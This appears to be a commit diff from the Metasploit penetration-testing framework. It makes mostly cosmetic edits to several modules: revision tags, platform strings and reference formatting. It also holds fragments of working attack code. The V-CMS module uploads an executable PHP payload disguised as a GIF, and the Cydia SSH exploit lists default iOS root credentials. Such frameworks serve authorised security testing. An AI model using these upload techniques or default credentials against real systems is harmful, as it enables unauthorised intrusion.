print_status("Request '#{request.uri}'...")
case request.method
when 'OPTIONS'
process_options(cli, request)
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
end
exploit()
end
def process_options(cli, request)
print_status("OPTIONS #{request.uri}")
headers = {

7
modules/auxiliary/server/http_ntlmrelay.rb
View File

@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'HTTP Client MS Credential Relayer',
'Version' => '$Revision:$',
'Version' => '$Revision$',
'Description' => %q{
This module relays negotiated NTLM Credentials from an HTTP server to multiple
protocols. Currently, this module supports relaying to SMB and HTTP.
@ -52,7 +52,6 @@ class Metasploit3 < Msf::Auxiliary
[
'Rich Lundeen <richard.lundeen[at]gmail.com>',
],
'Version' => '$Revision:$',
'License' => MSF_LICENSE,
'Actions' =>
[
@ -93,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
# Handles the initial requests waiting for the browser to try NTLM auth
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
@ -136,7 +135,7 @@ class Metasploit3 < Msf::Auxiliary
parse_args()
exploit()
end
def process_options(cli, request)
print_status("OPTIONS #{request.uri}")
headers = {

2
modules/auxiliary/vsploit/pii/web_pii.rb
View File

@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'Description' => 'This module emulates a webserver leaking PII data',
'License' => MSF_LICENSE,
'Author' => 'MJC',
'Version' => '$Revision: $',
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.metasploit.com'],

2
modules/encoders/x86/context_cpuid.rb
View File

@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback
def initialize
super(
'Name' => 'CPUID-based Context Keyed Payload Encoder',
'Version' => '$Revision: 1$',
'Version' => '$Revision$',
'Description' => %q{
This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.
},

3
modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['OSVDB', '61284']
],
'DefaultOptions' =>
{
@ -48,6 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
],
'Privileged' => true,
'DisclosureDate' => "Jul 2 2007",
'DefaultTarget' => 0))
register_options(

2
modules/exploits/freebsd/tacacs/xtacacsd_report.rb
View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'PrependEncoder' => "\x83\xec\x7f",
'DisableNops' => 'True',
},
'Platform' => 'BSD',
'Platform' => 'bsd',
'Arch' => ARCH_X86,
'Targets' =>
[

2
modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
['EDB', 18280]
['EDB', '18280']
],
'Privileged' => true,
'Platform' => 'bsd',

33
modules/exploits/linux/http/vcms_upload.rb
View File

@ -6,11 +6,13 @@
##
require 'msf/core'
require 'msf/core/exploit/php_exe'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info={})
super(update_info(info,
@ -28,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'AutoSec Tools', #Initial discovery
'sinn3r' #Metasploit
'AutoSec Tools', # Initial discovery
'sinn3r' # Metasploit
],
'References' =>
[
@ -42,15 +44,12 @@ class Metasploit3 < Msf::Exploit::Remote
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'EXITFUNC' => "none"
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['V-CMS 1.0', {}],
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
],
'Privileged' => false,
'DisclosureDate' => "Nov 27 2011", #When the ticket was created
@ -75,15 +74,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
def on_new_session(client)
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
client.fs.file.rm(@payload_name)
else
client.shell_command_token("rm #{@payload_name}")
end
end
def exploit
peer = "#{rhost}:#{rport}"
@ -91,18 +81,13 @@ class Metasploit3 < Msf::Exploit::Remote
base << '/' if base[-1,1] != '/'
@payload_name = "#{rand_text_alpha(5)}.php"
p = %Q|<?php
#{payload.encoded}
?>
|
p = p.gsub(/^\t\t/, '')
p = get_write_exec_payload(:unlink_self=>true)
post_data = "------x\r\n"
post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n"
post_data << "Content-Type: image/gif\r\n"
post_data << "\r\n"
post_data << p
post_data << p + "\r\n"
post_data << "------x--\r\n"
print_status("#{peer} Uploading payload: #{@payload_name}")
@ -133,4 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote
handler
end
end
end

Some files were not shown because too many files have changed in this diff Show More